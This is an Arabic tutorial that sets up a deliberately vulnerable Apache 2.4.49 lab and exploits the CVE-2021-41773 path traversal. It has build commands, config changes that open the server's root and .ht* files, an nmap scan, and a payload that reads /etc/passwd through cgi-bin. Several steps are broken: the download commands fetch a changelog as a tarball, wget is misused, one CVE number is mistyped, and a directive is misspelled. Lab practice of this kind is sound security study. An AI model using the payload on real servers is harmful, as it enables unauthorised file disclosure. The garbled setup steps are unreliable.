
برنامج تعليمي خطوة بخطوة يوضح كيفية إعداد بيئة Apache 2.4.49 قابلة للاستغلال واستغلال CVE-2021-41773 لتجاوز المسار باستخدام أجهزة Kali Linux وUbuntu Server الافتراضية.
هذا مثال عملي على كيفية استغلال الثغرة CVE-2021-4773 باستخدام آلة افتراضية
لهذا البرنامج التعليمي تحتاج إلى ما يلي:
إذاً لنبدأ عندما يكون لديك آلتين افتراضيتين تعملان، ستقوم بتثبيت أباتشي الإصدار 2.4.49 من مستودع أرشيفي يمكنك العثور على هذا الإصدار في: https://archive.apache.org/dist/httpd/CHANGES_2.4.49
1 في المرة الأولى على خادم آلتك الافتراضية، تحتاج إلى تشغيل الأمر التالي:
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2
2 في المرة الثانية تحتاج إلى فك ضغط هذا الإصدار من أباتشي كالتالي:
tar -xvjf httpd-2.4.49.tar.bz2
3 قم بتثبيت الحزمة التالية:
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev
4 قم بتشغيل ملف التنفيذ في الدليل الرئيسي (اسم الملف configure) باستخدام العلامة لتحديد دليل التثبيت:
./configure --prefix=/usr/local/apache2
5 قم بتجميع الإصدار الضعيف:
make
6 قم بتثبيت الإصدار الضعيف:
make install
7 تحقق من الإصدار:
ls /usr/local/apache2
8 ابدأ العملية:
/usr/local/apache2/bin/apachectl start
9 تحقق من العملية:
ps aux | grep httpd
10 قم بتكوين الثغرة: ابحث عن الملف /usr/local/apache2/conf/httpd.conf وقم بتكوين دليل المسؤول ابحث عن وسم directory وقم بتغيير Require all denied إلى
Required all granted
ابحث عن وسم Files .ht* Required all denied إلى
Required all granted
التغيير الأول هو لاستغلال الثغرة في البيئة المحلية والثاني هو التعريض في البيئة الحقيقية
1 قم بمسح عنوان IP باستخدام nmap بالأمر التالي:
nmap -sV ip_address
2 قم بتنفيذ curl أو wget لاختبار خادم أباتشي:
curl ip_address or make wget ip_address
3 راجع كيفية استغلال الثغرة في الصفحة التالية إذا كنت تريد فهم الصيغة:
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability
أو استخدم فقط الحمولة التالية:
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd